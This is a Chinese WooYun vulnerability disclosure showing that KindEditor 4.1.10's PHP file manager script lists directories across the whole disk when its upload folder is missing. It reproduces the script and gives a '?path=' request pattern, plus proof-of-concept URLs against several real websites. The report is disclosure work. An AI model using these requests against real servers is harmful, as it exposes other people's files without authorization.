当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(20) 关注此漏洞

缺陷编号: WooYun-2014-67044

漏洞标题: Kindeditor特定情况可能会导致全盘浏览

相关厂商: 上海浩跃软件有限公司

漏洞作者: Tea

提交时间: 2014-07-06 18:53

公开时间: 2014-10-02 18:54

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 目录浏览

8人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-06: 细节已通知厂商并且等待厂商处理中
2014-07-09: 厂商已经确认,细节仅向厂商公开
2014-07-12: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-02: 细节向核心白帽子及相关领域专家公开
2014-09-12: 细节向普通白帽子公开
2014-09-22: 细节向实习白帽子公开
2014-10-02: 细节向公众公开

简要描述:

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

详细说明:

下载地址:

http://**.**.**.**/files/kindeditor-4.1.10.zip

貌似是最新版本的。

测试语言:PHP

测试漏洞文件:/kindeditor/php/file_manager_json.php

默认配置(第16行):

code 区域
$root_path = $php_path . '../attached/';



当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

code 区域
$root_path = $php_path . '../../../upload/';



这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

code 区域
<?php


/**


 * KindEditor PHP


 *


 * 本PHP程序是演示程序,建议不要直接在实际项目中使用。


 * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。


 *


 */





require_once 'JSON.php';





$php_path = dirname(__FILE__) . '/';


$php_url = dirname($_SERVER['PHP_SELF']) . '/';





//根目录路径,可以指定绝对路径,比如 /var/www/attached/


$root_path = $php_path . '../../../upload/';


//根目录URL,可以指定绝对路径,比如 http://**.**.**.**/attached/


$root_url = $php_url . '../../../upload/';


//图片扩展名


$ext_arr = array('gif', 'jpg', 'jpeg', 'png', 'bmp');





//目录名


$dir_name = empty($_GET['dir']) ? '' : trim($_GET['dir']);


if (!in_array($dir_name, array('', 'image', 'flash', 'media', 'file'))) {


	echo "Invalid Directory name.";


	exit;


}


if ($dir_name !== '') {


	$root_path .= $dir_name . "/";


	$root_url .= $dir_name . "/";


	if (!file_exists($root_path)) {


		mkdir($root_path);


	}


}





//根据path参数,设置各路径和URL


if (empty($_GET['path'])) {


	$current_path = realpath($root_path) . '/';


	$current_url = $root_url;


	$current_dir_path = '';


	$moveup_dir_path = '';


} else {


	$current_path = realpath($root_path) . '/' . $_GET['path'];


	$current_url = $root_url . $_GET['path'];


	$current_dir_path = $_GET['path'];


	$moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/', '$1', $current_dir_path);


}


//echo realpath($root_path);


//排序形式,name or size or type


$order = empty($_GET['order']) ? 'name' : strtolower($_GET['order']);





//不允许使用..移动到上一级目录


if (preg_match('/\.\./', $current_path)) {


	echo 'Access is not allowed.';


	exit;


}


//最后一个字符不是/


if (!preg_match('/\/$/', $current_path)) {


	echo 'Parameter is not valid.';


	exit;


}


//目录不存在或不是目录


if (!file_exists($current_path) || !is_dir($current_path)) {


	echo 'Directory does not exist.';


	exit;


}





//遍历目录取得文件信息


$file_list = array();


if ($handle = opendir($current_path)) {


	$i = 0;


	while (false !== ($filename = readdir($handle))) {


		if ($filename{0} == '.') continue;


		$file = $current_path . $filename;


		if (is_dir($file)) {


			$file_list[$i]['is_dir'] = true; //是否文件夹


			$file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件


			$file_list[$i]['filesize'] = 0; //文件大小


			$file_list[$i]['is_photo'] = false; //是否图片


			$file_list[$i]['filetype'] = ''; //文件类别,用扩展名判断


		} else {


			$file_list[$i]['is_dir'] = false;


			$file_list[$i]['has_file'] = false;


			$file_list[$i]['filesize'] = filesize($file);


			$file_list[$i]['dir_path'] = '';


			$file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));


			$file_list[$i]['is_photo'] = in_array($file_ext, $ext_arr);


			$file_list[$i]['filetype'] = $file_ext;


		}


		$file_list[$i]['filename'] = $filename; //文件名,包含扩展名


		$file_list[$i]['datetime'] = date('Y-m-d H:i:s', filemtime($file)); //文件最后修改时间


		$i++;


	}


	closedir($handle);


}





//排序


function cmp_func($a, $b) {


	global $order;


	if ($a['is_dir'] && !$b['is_dir']) {


		return -1;


	} else if (!$a['is_dir'] && $b['is_dir']) {


		return 1;


	} else {


		if ($order == 'size') {


			if ($a['filesize'] > $b['filesize']) {


				return 1;


			} else if ($a['filesize'] < $b['filesize']) {


				return -1;


			} else {


				return 0;


			}


		} else if ($order == 'type') {


			return strcmp($a['filetype'], $b['filetype']);


		} else {


			return strcmp($a['filename'], $b['filename']);


		}


	}


}


usort($file_list, 'cmp_func');





$result = array();


//相对于根目录的上一级目录


$result['moveup_dir_path'] = $moveup_dir_path;


//相对于根目录的当前目录


$result['current_dir_path'] = $current_dir_path;


//当前目录的URL


$result['current_url'] = $current_url;


//文件数


$result['total_count'] = count($file_list);


//文件列表数组


$result['file_list'] = $file_list;





//输出JSON字符串


header('Content-type: application/json; charset=UTF-8');


$json = new Services_JSON();


echo $json->encode($result);



第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

漏洞证明:

接着上面给出验证的(互联网找到几个):

先给本地的(attached文件夹被我删了):

1.jpg



2.jpg



互联网找到的:

http://**.**.**.**/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

1.jpg



http://**.**.**.**/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/

2.jpg



http://**.**.**.**/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

3.jpg

修复方案:

再验证下绝对路径?

版权声明:转载请注明来源 Tea@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-09 15:28

厂商回复:

暂未建立与软件生产厂商的处置渠道,先行确认,待认领。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-07-31 22:43 | j2ck3r ( 普通白帽子 | Rank:424 漏洞数:98 | 别关注我,跟你不熟。)
    0

    测试是什么版本的?

    1# 回复此人
  2. 2014-08-02 23:34 | Tea ( 普通白帽子 | Rank:321 漏洞数:40 | Can't We Be Young.)
    0

    @j2ck3r 详细说明里面有,最新版本吧。

    2# 回复此人
  3. 2014-08-03 12:42 | j2ck3r ( 普通白帽子 | Rank:424 漏洞数:98 | 别关注我,跟你不熟。)
    1

    @Tea 这漏洞我从来没有成功过 不知道你是在什么环境下成功的

    3# 回复此人
  4. 2014-08-03 12:45 | Tea ( 普通白帽子 | Rank:321 漏洞数:40 | Can't We Be Young.)
    0

    @j2ck3r 例子,还有乌云。

    4# 回复此人
  5. 2014-10-02 09:51 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @Tea 应该很少有CMS的kindeditor会没有attached目录吧

    5# 回复此人
  6. 2014-10-08 10:00 | Tea ( 普通白帽子 | Rank:321 漏洞数:40 | Can't We Be Young.)
    0

    @U神 前面说了。。配置文件跟目录不一致了就会有。。默认是存在那目录的。所以标题叫特定情况。。

    6# 回复此人

登录后才能发表评论,请先 登录